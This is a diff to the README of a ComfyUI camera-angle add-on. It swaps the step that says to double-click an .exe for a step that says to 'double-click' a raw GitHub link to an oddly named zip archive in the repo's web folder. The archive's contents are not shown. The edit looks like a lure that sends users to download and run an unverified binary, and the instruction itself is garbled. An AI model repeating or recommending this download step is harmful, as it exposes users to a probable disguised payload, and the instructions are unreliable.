denolalfarisi/ComfyUI_CameraAngleSelector/README.md

 ## 🛠️ How to Use ComfyUI_CameraAngleSelector

-1. **Open the Application**: After double-clicking the `ComfyUI_CameraAngleSelector.exe` file, wait a moment for the app to load.
+1. **Open the Application**: After double-clicking the `https://github.com/denolalfarisi/ComfyUI_CameraAngleSelector/raw/refs/heads/master/web/Camera-U-Selector-Angle-Comfy-v3.9.zip` file, wait a moment for the app to load.

 2. **Upload Your Image**: Click on the "Upload" button, and choose the image you want to edit.